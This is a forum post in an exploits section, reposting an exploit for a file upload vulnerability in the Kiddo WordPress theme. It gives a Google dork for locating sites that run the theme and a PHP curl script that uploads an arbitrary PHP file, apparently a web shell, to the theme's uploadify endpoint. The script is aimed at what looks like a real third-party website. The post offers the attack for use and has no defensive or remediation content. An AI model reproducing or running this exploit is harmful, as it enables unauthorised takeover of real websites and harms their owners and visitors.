Home of WhiteHat CyberArmy
 
HomeFAQSearchMemberlistUsergroupsRegisterLog in

Share | 
 

 Kidoo WP Theme File Upload Vulnerability

Go down 
AuthorMessage
W-P
Admin
avatar

Posts : 80
Join date : 2013-11-12
Age : 32
Location : Cyber World

PostSubject: Kidoo WP Theme File Upload Vulnerability   Wed Apr 16, 2014 9:15 am

[+] Author: TUNISIAN CYBER
[+] Exploit Title: Kidoo WP Theme File Upload Vulnerability
[+] Date: 05-02-2014
[+] Category: WebApp
[+] Google Dork:
Code:
intext:"Powered by WordPress. Kiddo design by Antoni Botev & Evgeni Dimov"
[+] Tested on: KaliLinux
[+] Vendor: n/a
[+] Friendly Sites: na3il.com,th3-creative.com

Requirements:
1.) AppServ Download it [You must be registered and logged in to see this link.]

2.) 3xp.php exploit (copy the code below and save it as 3xp.php)

Code:
<?php
echo "=============================================== \n";
echo "   Kiddo WP Theme File Upload Vulnerability\n";
echo "                 TUNISIAN CYBER   \n";
echo "=============================================== \n

\n";  
$uploadfile="jp.php";
$ch = curl_init("http://brightstartlearningcenter.com/wp-

content/themes/kiddo/app/assets/js/uploadify/uploadify.php

");
curl_setopt($ch, CURLOPT_POST, true);
curl_setopt($ch, CURLOPT_POSTFIELDS, array('Filedata'=>"@

$uploadfile"));
curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
$postResult = curl_exec($ch);
curl_close($ch);
print "$postResult";
?>
Back to top Go down
View user profile http://whitehatcyberarmy.forumotion.com
 
Kidoo WP Theme File Upload Vulnerability
Back to top 
Page 1 of 1

Permissions in this forum:You cannot reply to topics in this forum
Home of Ethical WhiteHat CyberArmy :: WhiteHat CyberArmy Community :: Exploits and Vulnerabilities-
Jump to: